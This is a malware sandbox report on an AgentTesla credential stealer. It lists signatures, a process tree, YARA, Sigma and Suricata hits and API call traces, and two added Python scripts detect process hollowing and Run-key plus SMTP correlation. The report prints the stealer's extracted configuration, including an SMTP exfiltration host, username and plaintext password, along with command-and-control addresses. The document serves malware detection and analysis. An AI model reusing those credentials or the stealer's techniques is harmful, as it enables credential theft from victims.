
Windows Analysis Report
SOA_9828392091.exe

Overview

General Information

Sample name: SOA_9828392091.exe
Analysis ID: 1562878
MD5: 180595851681bf165b09671519906dd1
SHA1: 2ddf0c1fd34ce5d9de9de60c39ce4b0b4ba7cac8
SHA256: cc1e3f414454270d801d9dc8251ad2fc700476fdcce48da792fd48ff391f22e7

Detection

AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • SOA_9828392091.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\SOA_9828392091.exe" MD5: 180595851681BF165B09671519906DD1)
    • RegSvcs.exe (PID: 968 cmdline: "C:\Users\user\Desktop\SOA_9828392091.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • yGbzOMp.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • yGbzOMp.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
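The process tree above carries two indicators a practitioner can read directly without the sandbox: RegSvcs.exe (PID 968) runs with the dropper's command line, which is what process hollowing looks like (the child is created suspended under the parent's command line and its image is replaced), and the dropped persistence copy yGbzOMp.exe has the same MD5 as RegSvcs.exe, so it is a byte-identical copy of the .NET framework utility. The check below is an added example by the editor, not part of the Joe Sandbox report; the process records are transcribed from the tree (full path of RegSvcs.exe taken from the Sigma data), conhost.exe is included as a control, and the two checks are the editor's own.

```python
"""Two process-hollowing indicators read off a sandbox process tree.

Added example, not part of the Joe Sandbox report. Records are transcribed
from the report's process tree; the checks are the editor's:
(1) command line names a different executable than the loaded image, and
(2) one file hash appears under two different file names.
"""
import ntpath
from collections import defaultdict

# Transcribed from the report's process tree (MD5s lower-cased).
PROCESSES = [
    {"pid": 7152, "image": r"C:\Users\user\Desktop\SOA_9828392091.exe",
     "cmdline": r'"C:\Users\user\Desktop\SOA_9828392091.exe"',
     "md5": "180595851681bf165b09671519906dd1"},
    {"pid": 968, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\Desktop\SOA_9828392091.exe"',
     "md5": "9d352bc46709f0cb5ec974633a0c3c94"},
    {"pid": 7104, "image": r"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"',
     "md5": "9d352bc46709f0cb5ec974633a0c3c94"},
    {"pid": 1976, "image": r"C:\Windows\system32\conhost.exe",   # control record
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "0d698af330fd17bee3bf90011d49251d"},
]


def cmdline_executable(cmdline):
    """Return the executable token of a Windows command line (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end != -1 else cmdline[1:]
    return cmdline.split(None, 1)[0]


def find_cmdline_mismatches(procs):
    """PIDs whose command line names a different binary than the loaded image.

    A legitimate process normally runs under its own path; a mismatch is the
    classic hollowing footprint (suspended create + WriteProcessMemory).
    """
    out = []
    for p in procs:
        claimed = ntpath.basename(cmdline_executable(p["cmdline"])).lower()
        actual = ntpath.basename(p["image"]).lower()
        if claimed != actual:
            out.append(p["pid"])
    return out


def find_hash_reuse(procs):
    """MD5s that appear under more than one file name.

    Catches a system binary copied to a user-writable path for persistence
    (here: RegSvcs.exe copied to %APPDATA%\\yGbzOMp\\yGbzOMp.exe).
    """
    names = defaultdict(set)
    for p in procs:
        names[p["md5"].lower()].add(ntpath.basename(p["image"]))
    return {h: n for h, n in names.items() if len(n) > 1}


if __name__ == "__main__":
    print("cmdline/image mismatch:", find_cmdline_mismatches(PROCESSES))
    print("hash reuse:", find_hash_reuse(PROCESSES))
```

Treat both results as indicators, not proof: some launchers and updaters legitimately start a child under a different command line, and a copied system binary by itself is not malicious. What makes the pair decisive here is that the report also records "Creates a process in suspended mode", "Writes to foreign memory regions" and a RegSvcs.pdb debug string inside yGbzOMp.exe.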
Threat intelligence (Malpedia)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Host": "mail.palumalimited.com", "Username": "novlove@palumalimited.com", "Password": "85h!UAfvL2AE"}
Yara matches in process memory dumps
Source | Rule | Description | Author
00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  Matched strings:
  • 0x31d5f:$a13: get_DnsResolver
  • 0x30458:$a20: get_LastAccessed
  • 0x3278d:$a27: set_InternalServerPort
  • 0x32ac2:$a30: set_GuidMasterKey
  • 0x3056a:$a33: get_Clipboard
  • 0x30578:$a34: get_Keyboard
  • 0x31959:$a35: get_ShiftKeyDown
  • 0x3196a:$a36: get_AltKeyDown
  • 0x30585:$a37: get_Password
  • 0x310b4:$a38: get_PasswordHash
  • 0x321c1:$a39: get_DefaultCredentials
00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(8 further entries not shown)
Yara matches in unpacked PE images
Source | Rule | Description | Author
0.2.SOA_9828392091.exe.22c0000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.SOA_9828392091.exe.22c0000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.SOA_9828392091.exe.22c0000.1.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  Matched strings:
  • 0x3015f:$a13: get_DnsResolver
  • 0x2e858:$a20: get_LastAccessed
  • 0x30b8d:$a27: set_InternalServerPort
  • 0x30ec2:$a30: set_GuidMasterKey
  • 0x2e96a:$a33: get_Clipboard
  • 0x2e978:$a34: get_Keyboard
  • 0x2fd59:$a35: get_ShiftKeyDown
  • 0x2fd6a:$a36: get_AltKeyDown
  • 0x2e985:$a37: get_Password
  • 0x2f4b4:$a38: get_PasswordHash
  • 0x305c1:$a39: get_DefaultCredentials
0.2.SOA_9828392091.exe.22c0000.1.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  Matched strings:
  • 0x32c9d:$s10: logins
  • 0x32717:$s11: credential
  • 0x2e96a:$g1: get_Clipboard
  • 0x2e978:$g2: get_Keyboard
  • 0x2e985:$g3: get_Password
  • 0x2fd49:$g4: get_CtrlKeyDown
  • 0x2fd59:$g5: get_ShiftKeyDown
  • 0x2fd6a:$g6: get_AltKeyDown
0.2.SOA_9828392091.exe.22c0000.1.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(7 further entries not shown)

Sigma and Suricata Overview

Sigma: CurrentVersion Autorun Keys Modification | Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yGbzOMp
Sigma: Suspicious Outbound SMTP Connections | Source: Network Connection | Author: frack113 | Data: DestinationIp: 174.136.29.110, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 968, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-11-26T08:22:11.519362+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6:49699 | 174.136.29.110:587 | TCP
2024-11-26T08:22:11.519362+0100 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49699 | 174.136.29.110:587 | TCP
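Both Sigma hits above come from the same process (RegSvcs.exe, PID 968): one writes a Run key pointing into %APPDATA%, the other opens TCP/587 to a remote mail server. Individually each rule is noisy; a Run-key write happens on every software install and port 587 is normal for a mail client. Correlating the two by ProcessId, and checking who the writer is and where the Run value points, is what turns them into a confident stealer verdict. The script below is an added example by the editor, not part of the Joe Sandbox report or the Sigma project. Its event records are constructed to mirror the two Sigma hits (Sysmon event 13 and event 3 field names) plus two benign decoys; the host-binary list and the mail-client allow-list are the editor's assumptions.

```python
"""Correlate Sysmon-style events into one verdict per process.

Added example by the editor, not part of the Joe Sandbox report. Event
records are constructed to mirror the report's two Sigma hits plus decoys;
field names follow Sysmon event IDs 13 (registry SetValue) and 3 (network).
"""
import re
from collections import defaultdict

RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
SMTP_PORTS = {25, 465, 587}
# Assumption: the report shows only RegSvcs.exe; RegAsm.exe is added by the
# editor as a commonly paired .NET utility. Extend for your environment.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe"}
# Assumption: site-specific allow-list of processes expected to speak SMTP.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

EVENTS = [  # constructed sample input
    {"EventID": 13, "EventType": "SetValue", "ProcessId": 968,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yGbzOMp",
     "Details": r"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"},
    {"EventID": 3, "ProcessId": 968, "Initiated": True, "Protocol": "tcp",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "DestinationIp": "174.136.29.110", "DestinationPort": 587},
    # decoy: a real mail client submitting mail on 587
    {"EventID": 3, "ProcessId": 4120, "Initiated": True, "Protocol": "tcp",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationIp": "203.0.113.25", "DestinationPort": 587},
    # decoy: a registry write under CurrentVersion that is not a Run key
    {"EventID": 13, "EventType": "SetValue", "ProcessId": 3300,
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Indicator tags for a single event (empty set if nothing notable)."""
    tags = set()
    name = image_name(ev["Image"])
    if ev["EventID"] == 13 and ev.get("EventType") == "SetValue" \
            and RUN_KEY_RE.search(ev.get("TargetObject", "")):
        tags.add("run_key_write")
        if name in DOTNET_HOSTS:
            tags.add("run_key_write_by_dotnet_host")
        details = ev.get("Details", "").lower()
        if "\\appdata\\roaming\\" in details or "\\appdata\\local\\" in details:
            tags.add("run_key_points_to_appdata")
    if ev["EventID"] == 3 and ev.get("Initiated") \
            and ev.get("DestinationPort") in SMTP_PORTS \
            and name not in MAIL_CLIENTS:
        tags.add("smtp_from_non_mail_client")
    return tags


def correlate(events):
    """Group tags by (pid, image); 'high' when persistence and SMTP co-occur."""
    by_proc = defaultdict(set)
    for ev in events:
        by_proc[(ev["ProcessId"], image_name(ev["Image"]))] |= classify(ev)
    findings = []
    for (pid, name), tags in by_proc.items():
        if not tags:
            continue
        both = {"run_key_write", "smtp_from_non_mail_client"} <= tags
        findings.append({"pid": pid, "image": name, "tags": sorted(tags),
                         "verdict": "high" if both else "low"})
    return sorted(findings, key=lambda f: f["pid"])


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f)
```

The grouping key is (ProcessId, image name) rather than ProcessId alone because PIDs are reused; in a real pipeline use Sysmon's ProcessGuid. Note that the decoy Outlook connection and the Explorer registry write produce no finding at all, while the RegSvcs.exe process collects all four tags.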


                AV Detection

Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "SMTP", "Host": "mail.palumalimited.com", "Username": "novlove@palumalimited.com", "Password": "85h!UAfvL2AE"}
Source: mail.palumalimited.com | Virustotal: Detection: 5%
Source: SOA_9828392091.exe | ReversingLabs: Detection: 39%
Source: SOA_9828392091.exe | Virustotal: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SOA_9828392091.exe | Joe Sandbox ML: detected
Source: SOA_9828392091.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: RegSvcs.pdb, | source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
Source: Binary string: wntdll.pdbUGP | source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb | source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00976CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00981B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00981C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00981F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:49699 -> 174.136.29.110:587
Source: Network traffic | Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.6:49699 -> 174.136.29.110:587
Source: global traffic | TCP traffic: 192.168.2.6:49699 -> 174.136.29.110:587
Source: Joe Sandbox View | IP Address: 174.136.29.110
Source: Joe Sandbox View | ASN Name: IHNETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00984EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: mail.palumalimited.com
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://dEIFpD.com
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.palumalimited.com
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://palumalimited.com
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wixxOvts0RfcEfM.org
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00986B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00986D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00972B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                System Summary

Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00933D19 references the string "This is a third-party compiled AutoIt script."
Source: SOA_9828392091.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_18fe0b95-3)
Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_3a1071ba-0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00933742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009A00AF NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009A0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009A044C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099E9AF NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094AAFC NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094AB4F NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099EC7C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094B11F NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F2D0 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094B385 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F5AB NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F5DA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F689 ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F609 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F654 NtdllDialogWndProc_W
